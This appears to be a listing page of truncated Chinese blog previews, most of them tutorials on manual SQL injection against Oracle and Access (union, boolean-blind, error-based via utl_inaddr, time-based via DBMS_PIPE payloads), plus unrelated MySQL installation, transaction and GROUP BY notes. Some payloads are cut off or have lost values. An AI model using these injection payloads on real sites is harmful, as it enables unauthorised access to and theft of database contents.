0X01 先进行判断 a.jsp?username=SMITH and = 发现单引号闭合  我们尝试构造闭合  存在注入 a.jsp?username=SMITH'='1 正确 a.jsp?username=SMITH'='2 错误 0X02构造语句判断 a.jsp?username=SMITH' order by 8-- 正确 a.jsp?username=SMITH' order by 9-- 错误 用null 判断那个字段是字符型  第2 3 个字段为字符型 a.jsp?username…

0X01判断闭合 ?username=SMITH' 错误 ?username=SMITH'' 正确 ?username=SMITH' and ascii(substr((select user from dual),1,1))>82 那么是‘闭合 0X02基于bool的盲注 根据返回信息判断 ?username=SMITH' and ascii(substr((select user from dual),1,1))>82 -- 正确 ?username=SMITH' and ascii(su…

0X01 使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式. news.jsp?id= and = 正确 news.jsp?id= and = 错误 存在注入  随便输入 发现存在报错信息我们可以尝试报错注入 0X02报错函数注入 utl_inaddr.get_host_name()进行报错注入 and =utl_inaddr.get_host_name(()) utl_inaddr…

0X01Oracle基于延时的盲注总结 0x00 前言 oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注: oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:(select count(*) from all_objects),对数据库中大量数据进行查询或其…

5/30 报错注入 0x01 准备阶段 1. 基础知识今天了解了,但是,只能看懂和最基本的理解,不能自己上路.所以,还是要不停学习基础.并且及时总结.这有一篇很详细的文章:https://www.cnblogs.com/pshell/articles/7473713.html 2.现在有基本思路了.先找注入点,然后再确定有几个字段,再确定字段的位置.通过字段位置,查数据库名.表名.列名. 3.找注入点.确定字段数.判断回显位置. 然后发现有三个null,接下来,我们寻找三个null中,哪些才是真…

一.Microsoft Office Access数据库手工注入语句  1.参数后面加  ’ .and 1=1.and 1=2看返回状态判断是否存在注入点 2.参数后面加 and exists(select*from admin) 猜表名  返回正常页面表示存在(admin)3.参数后面加 and exists(select username from admin)猜(admin)表中是否存在列名(username) 返回正常页面表示存在 4.参数后面加 and (select top 1 le…

1)查看CentOS自带的mysql 输入 rpm -qa | grep mysql mysql-libs-5.1.71-1.el6.x86_64 2)将其自带的mysql版本全部卸载(非常重要,如不卸载,后面会产生冲突) rpm -e --nodeps (mysql版本号,就是上面检查到的mysql-libs-5.1.71-1.el6.x86_64) 或者用这条命令卸载,yum -y remove mysql-libs* 3)检查是否将自带的mysql版本卸载了  rpm -qa | grep…

前言 前面我们介绍过数据库中 带你了解数据库中JOIN的用法 与 带你了解数据库中group by的用法的相关用法.本章节主要来介绍下数据库中一个非常重要的知识点事务,也是我们项目中或面试中经常会遇到的知识点.如有错误还请大家及时指出~ 涉及面试题: 请讲下你对事务的理解? 讲下事务有那几大特性? 以下都是采用mysql数据库 事务 事务(Transaction),是我们关系型数据库中非常重要的一个概念,它要符合ACID特性.是由一组SQL语句组成的一个程序执行单元(Unit),该执行单元要么成…

前言 本章主要介绍数据库中group by的用法,也是我们在使用数据库时非常基础的一个知识点.并且也会涉及Join的使用,关于Join的用法,可以看我写的上一篇文章:带你了解数据库中JOIN的用法如有错误还请大家及时指出~ 以下都是采用mysql数据库 Group By 概念 Group By语句从英文的字面意义上理解就是"根据(by)一定的规则进行分组(Group)". 作用:通过一定的规则将一个数据集划分成若干个小的区域,然后针对若干个小区域进行数据处理. 注意:group by…

MySQL数据库-SQL注入和pymysql模块防止SQL注入 SQL注入就是通过SQL语句绕开程序判断,获取到数据库的内容 下面以一个简单的程序登录SQL注入举例: 正常登录 1.数据库有一张会员表 2.用户输入账号和密码,到数据库查找此用户是否存在,存在登录成功,不存在登录失败 #!/usr/bin/env python #coding:utf-8 import tornado.ioloop import tornado.web #导入tornado模块下的web文件 import pymy…